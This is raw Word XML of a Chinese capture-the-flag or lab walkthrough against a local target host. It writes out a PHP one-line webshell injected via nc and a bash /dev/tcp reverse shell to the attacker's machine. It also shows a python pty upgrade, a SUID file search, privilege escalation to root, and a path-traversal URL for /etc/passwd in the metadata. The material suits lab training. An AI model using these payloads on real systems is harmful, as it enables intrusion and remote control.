        <w:t>正好8</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口有，我直接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连上去，来个一句话木马</w:t>
      </w:r>
      <w:r w:rsidR="00144691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（别用post之后需要在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00144691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00144691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上反弹shell只能用get）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC3AE3" w14:textId="7E713FE9" w:rsidR="009931A4" w:rsidRDefault="009931A4" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009931A4">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009931A4">
        <w:t xml:space="preserve"> 192.168.21.147 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E81E6B2" w14:textId="1A501017" w:rsidR="00144691" w:rsidRDefault="00144691" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00144691">
        <w:t>GET&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00144691">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00144691">
        <w:t xml:space="preserve"> system($_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00144691">
        <w:t>GET[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00144691">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r w:rsidRPr="00144691">
        <w:t>obrine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00144691">
        <w:t>]);?&gt;http/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B3B71" w14:textId="181D58EF" w:rsidR="009931A4" w:rsidRDefault="00144691" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00144691">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0210AA6D" wp14:editId="74A27988">
            <wp:extent cx="5274310" cy="2832735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1355668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68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415A" w14:textId="75E25494" w:rsidR="009931A4" w:rsidRDefault="009931A4" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来需要反弹shell</w:t>
      </w:r>
      <w:r w:rsidR="00144691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用一句话木马执行</w:t>
      </w:r>
      <w:r w:rsidR="001A2D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（进行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A2D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A2D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670A4CF6" w14:textId="2A1CCA9D" w:rsidR="009931A4" w:rsidRDefault="009931A4" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009931A4">
        <w:t>bash -c 'exec bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009931A4">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009931A4">
        <w:t xml:space="preserve"> &amp;&gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009931A4">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009931A4">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00144691">
        <w:t>192.168.21.146/666</w:t>
      </w:r>
      <w:r w:rsidRPr="009931A4">
        <w:t xml:space="preserve"> &lt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339AC3B5" w14:textId="6E063BD3" w:rsidR="009931A4" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6332B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0031F655" wp14:editId="01D0110E">
            <wp:extent cx="5274310" cy="1160780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="360561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61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9265" w14:textId="5A5FECF7" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>优化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40072BC7" w14:textId="2B432499" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6332B">
        <w:t xml:space="preserve">python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E6332B">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E6332B">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E6332B">
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E6332B">
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C9A8BD" w14:textId="507F3D21" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6332B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C590CF4" wp14:editId="3F52D10B">
            <wp:extent cx="5273497" cy="792549"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="1746974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74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8508" w14:textId="152BE89A" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E5C2B4" w14:textId="581A3751" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6332B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00C91411" wp14:editId="479A4453">
            <wp:extent cx="5274310" cy="368935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1695778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86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CF16" w14:textId="0A590272" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6332B">
        <w:t>find / -user root -perm /4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4185279F" w14:textId="1F3921C7" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找root的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB4C42C" w14:textId="56C54115" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E6332B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685E9D5D" wp14:editId="41106D18">
            <wp:extent cx="5274310" cy="3235960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="859319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196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D1D1" w14:textId="02F78BB9" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一看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sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就很可疑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414FC77A" w14:textId="31C48D99" w:rsidR="00E6332B" w:rsidRDefault="00E6332B" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进去看看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2909614C" w14:textId="71AC02FD" w:rsidR="00E6332B" w:rsidRDefault="00AA6AAE" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA6AAE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EFB8D1B" wp14:editId="405118FC">
            <wp:extent cx="5274310" cy="3023870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="2041873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73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0707" w14:textId="350786E4" w:rsidR="00AA6AAE" w:rsidRDefault="00AA6AAE" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来需要找到哪个站点能访问/var</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CFB60B5" w14:textId="19FB71AB" w:rsidR="00AA6AAE" w:rsidRDefault="00AA6AAE" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA6AAE">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA6AAE">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA6AAE">
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA6AAE">
        <w:t xml:space="preserve"> | grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA6AAE">
        <w:t>sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04C10B24" w14:textId="59220238" w:rsidR="00AA6AAE" w:rsidRDefault="00AA6AAE" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA6AAE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08BC0440" wp14:editId="132C487B">
            <wp:extent cx="5274310" cy="630555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="263710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03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7339" w14:textId="77777777" w:rsidR="00BB4997" w:rsidRDefault="00BB4997" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4C4DB5" w14:textId="5B91255F" w:rsidR="00AA6AAE" w:rsidRDefault="00AA6AAE" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA6AAE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A538C72" wp14:editId="54F43A44">
            <wp:extent cx="5274310" cy="4089400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1243515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5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6A8A" w14:textId="5A1304AE" w:rsidR="00AA6AAE" w:rsidRDefault="00737B91" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口的web反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FCA82" w14:textId="64BE4E69" w:rsidR="00737B91" w:rsidRDefault="00737B91" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00737B91">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D2EF47" wp14:editId="7E326E86">
            <wp:extent cx="2712955" cy="830652"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1434078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80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4043" w14:textId="384B42A4" w:rsidR="00737B91" w:rsidRDefault="00737B91" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00737B91">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A4864A5" wp14:editId="0CADA967">
            <wp:extent cx="5274310" cy="238760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1165941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41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4BFA" w14:textId="6E8F71EF" w:rsidR="00737B91" w:rsidRDefault="00737B91" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00737B91">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1012DE8E" wp14:editId="3EF0A376">
            <wp:extent cx="4145639" cy="2034716"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="1310586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861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015D" w14:textId="77777777" w:rsidR="00BB4997" w:rsidRPr="00BB4997" w:rsidRDefault="00BB4997" w:rsidP="00BB4997">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4997">
        <w:t>即可得到root用户的反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687620ED" w14:textId="0331BD80" w:rsidR="00BB4997" w:rsidRPr="00BB4997" w:rsidRDefault="00BB4997" w:rsidP="00BB4997">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4997">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5365651B" wp14:editId="047B2471">
            <wp:extent cx="5274310" cy="1125855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7769090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23A1" w14:textId="77777777" w:rsidR="00BB4997" w:rsidRPr="00BB4997" w:rsidRDefault="00BB4997" w:rsidP="00BB4997">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4997">
        <w:t>分别在/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4997">
        <w:t>miguel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4997">
        <w:t>和/root下找到两个flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499590CF" w14:textId="08E56261" w:rsidR="00BB4997" w:rsidRPr="00BB4997" w:rsidRDefault="00BB4997" w:rsidP="00BB4997">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4997">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73E49F1D" wp14:editId="65B5C221">
            <wp:extent cx="5274310" cy="2987040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="13176664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0EF0" w14:textId="77777777" w:rsidR="00737B91" w:rsidRPr="00AA6AAE" w:rsidRDefault="00737B91" w:rsidP="00144691">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00737B91" w:rsidRPr="00AA6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1F4"/>
    <w:rsid w:val="00144691"/>
    <w:rsid w:val="001A2D9D"/>
    <w:rsid w:val="001F72B2"/>
    <w:rsid w:val="0022109E"/>
    <w:rsid w:val="005A3873"/>
    <w:rsid w:val="00737B91"/>
    <w:rsid w:val="00862512"/>
    <w:rsid w:val="009931A4"/>
    <w:rsid w:val="00AA6AAE"/>
    <w:rsid w:val="00BB4997"/>
    <w:rsid w:val="00C6485F"/>
    <w:rsid w:val="00E6332B"/>
    <w:rsid w:val="00E633CF"/>
    <w:rsid w:val="00E81B44"/>
    <w:rsid w:val="00EC2015"/>
    <w:rsid w:val="00EF6DB0"/>
    <w:rsid w:val="00F861F4"/>
    <w:rsid w:val="00FD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7185F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B92C8C59-C533-48E8-8A2E-4FD50D42C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201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C20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6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192.168.21.147/dvwa" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.21.147:8593/index.php?book=/../../../../etc/passwd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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-27T09:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-29T13:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>